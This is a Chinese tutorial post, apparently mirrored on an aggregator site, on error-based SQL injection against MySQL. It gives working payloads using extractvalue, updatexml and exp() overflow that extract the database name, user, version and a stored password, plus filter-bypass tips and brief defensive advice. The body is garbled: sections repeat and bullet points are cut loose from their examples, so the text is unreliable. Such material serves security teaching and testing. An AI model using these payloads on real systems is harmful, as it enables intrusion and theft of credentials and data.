当前位置: 首页 > news >正文

SQL错误注入攻防实战

news 2026/6/10 11:00:04

错误注入技术概述

错误注入(Error-based SQL Injection)是一种利用数据库报错信息泄露敏感数据的技术。通过构造特定SQL语句触发数据库错误,使错误信息中包含查询结果(如版本、表名、数据等)。常用于存在长度限制或过滤的场景。

常见错误注入函数及用法

extractvalue 函数

语法:extractvalue(XML_document, XPath_string)
通过XPath语法错误触发报错,返回目标数据:

?id=1 and extractvalue(1, concat(0x5c, (select database()), 0x5c))
  • 0x5c是反斜杠(\)的十六进制,用于强制XPath格式错误。
  • 报错信息会返回XPATH syntax error: '\database_name\'
updatexml 函数

语法:updatexml(XML_document, XPath_string, new_value)
通过XPath错误泄露数据(修正原笔误updatemxl):

?id=1 and updatexml(1, concat(0x7e, (select user()), 0x7e), 1)
  • 0x7e是波浪号(~)的十六进制,用于触发XPath错误。
  • 报错信息返回XPATH syntax error: '~username@hostname~'

绕过过滤的替代方法

updatexml被禁用,可尝试以下函数:

?id=1 or exp(~(select * from (select version())a))
  • 利用exp()函数溢出错误,返回类似DOUBLE value is out of range的报错信息。
输入框需用or连接的情况

当注入点位于非数值型字段(如字符串),需用or确保语句执行:

username=' or updatexml(1, concat(0x7e,(select password from users limit 1)),1) or '

注意事项

  1. 长度限制:报错信息可能有长度截断,可通过substring()分次提取数据。
    ?id=1 and updatexml(1, concat(0x7e, substring((select @@version),1,20)), 1)
  2. 过滤绕过:若关键字被过滤,可尝试大小写混淆、十六进制编码或注释符分割。
  3. 权限限制:确保当前数据库用户有权限访问目标表。

防御建议

updatexml 函数

语法:updatexml(XML_document, XPath_string, new_value)
通过XPath错误泄露数据(修正原笔误updatemxl):

?id=1 and updatexml(1, concat(0x7e, (select user()), 0x7e), 1)

绕过过滤的替代方法

updatexml被禁用,可尝试以下函数:

?id=1 or exp(~(select * from (select version())a))
输入框需用or连接的情况

当注入点位于非数值型字段(如字符串),需用or确保语句执行:

username=' or updatexml(1, concat(0x7e,(select password from users limit 1)),1) or '

注意事项

防御建议

  • 使用参数化查询或预编译语句。
  • 过滤特殊字符(如'"\)。
  • 关闭数据库详细错误回显。

    错误注入技术概述

    错误注入(Error-based SQL Injection)是一种利用数据库报错信息泄露敏感数据的技术。通过构造特定SQL语句触发数据库错误,使错误信息中包含查询结果(如版本、表名、数据等)。常用于存在长度限制或过滤的场景。

    常见错误注入函数及用法

    extractvalue 函数

    语法:extractvalue(XML_document, XPath_string)
    通过XPath语法错误触发报错,返回目标数据:

    ?id=1 and extractvalue(1, concat(0x5c, (select database()), 0x5c))
  • 0x5c是反斜杠(\)的十六进制,用于强制XPath格式错误。
  • 报错信息会返回XPATH syntax error: '\database_name\'
  • 0x7e是波浪号(~)的十六进制,用于触发XPath错误。
  • 报错信息返回XPATH syntax error: '~username@hostname~'
  • 利用exp()函数溢出错误,返回类似DOUBLE value is out of range的报错信息。
  • 长度限制:报错信息可能有长度截断,可通过substring()分次提取数据。
    ?id=1 and updatexml(1, concat(0x7e, substring((select @@version),1,20)), 1)
  • 过滤绕过:若关键字被过滤,可尝试大小写混淆、十六进制编码或注释符分割。
  • 权限限制:确保当前数据库用户有权限访问目标表。
  • 使用参数化查询或预编译语句。
  • 过滤特殊字符(如'"\)。
  • 关闭数据库详细错误回显。
http://www.zskr.cn/news/1339652.html

相关文章:

  • 还在手动逐句转录线下讲座录音?2026年这3款在线语音转文字工具5分钟搞定1小时录音
  • 从查重红线到 AIGC 警报?okbiye 论文降重 + 去 AI 痕迹,一键打通毕业双关卡
  • 告别手忙脚乱找字幕:Jellyfin智能字幕插件MaxSubtitle完全指南
  • 2026长沙全域奢侈品回收攻略:多网点布局上门变现更省心 - 诚鑫名品
  • 方言TTS落地难?ElevenLabs河南话适配经验全公开,含ASR对齐误差率压降至≤2.1%的私有调参表
  • Perplexity语法查询与SQL/GraphQL/Lucene三范式对比实测:在17种复杂语义场景下准确率差距达41.6%
  • 2026年Q2中国污水池清理优质服务商首选推荐:合肥玉通管道工程有限公司 - 安互工业信息
  • 从零开始使用Taotoken模型广场为你的应用选择最合适的大模型
  • 如何利用OOTDiffusion实现智能虚拟试衣:从技术原理到实战应用的完整指南
  • PowerBI主题模板完整指南:35个JSON模板快速打造专业报表
  • 开发AI应用时如何借助Taotoken模型广场进行选型
  • 高效智能的Windows音频管理神器:AudioSwitch让你的音频设备切换更简单
  • 血泪教训:一行 apt install docker* 让我搞了一晚上 Docker
  • 如何10分钟掌握百度网盘批量转存:新手完整指南与终极解决方案
  • 如何快速配置Windows字体:No!! MeiryoUI免费字体定制完全指南
  • 【linux使用技巧】复制粘贴快捷键
  • RPC 核心概念 02:IDL 与 Protobuf 详解
  • Taotoken API Key的权限管理与审计日志功能初探
  • Sunshine游戏串流平台:打造你的私人云游戏服务器
  • Python量化投资利器:5步掌握pywencai获取同花顺问财数据
  • 深度解析Perplexity图书评论搜索机制,手把手教你绕过信息茧房获取真实读者反馈
  • 将Hermes Agent对接至Taotoken的自定义提供商配置详解
  • 观察Taotoken账单明细实现精准成本追溯
  • 为什么很多政府部门的系统这么难用
  • 3分钟掌握Windows右键菜单管理:ContextMenuManager终极优化指南
  • 使命召唤21:黑色行动6 官方正版2026最新版pc免费下载(看到请立即转存 资源随时失效)手机版通用
  • 数字孪生 · 零基础4周速成学习计划(书籍+实操+项目落地)
  • OpenBoardView:免费开源PCB查看器的5大核心功能与完整使用指南
  • B站成分检测器:3分钟快速指南,智能识别评论区用户真实身份
  • 明日深圳文博会!BOSMA博冠与您相约